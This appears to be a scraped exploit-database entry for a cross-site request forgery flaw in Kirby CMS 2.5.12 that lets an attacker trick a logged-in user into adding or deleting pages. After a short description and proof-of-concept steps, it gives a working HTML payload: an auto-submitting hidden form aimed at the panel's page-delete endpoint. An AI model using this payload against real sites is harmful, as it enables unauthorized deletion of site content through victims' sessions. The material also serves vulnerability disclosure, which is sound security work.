kirby cms 2.5.12 crosssite request forgery (delete page)
▸▸▸ Exploit & Vulnerability >> webapps exploit & linux vulnerability
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page) # Date: 2018-07-22 # Exploit Author: Zaran Shaikh # Version: 2.5.12 # CVE: NA # Category: Web Application # 1. Description # The application allows malicious HTTP requests to be sent in order to # trick a user into adding/ deleting web pages. # 2. Proof of Concept 1. Visit the application 2. Go to add page option 3. Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted 4. Payload: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete"> <input type="hidden" name="_redirect" value="site/subpages" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>
Kirby cms 2.5.12 crosssite request forgery (delete page) Vulnerability / Exploit Source : Kirby cms 2.5.12 crosssite request forgery (delete page)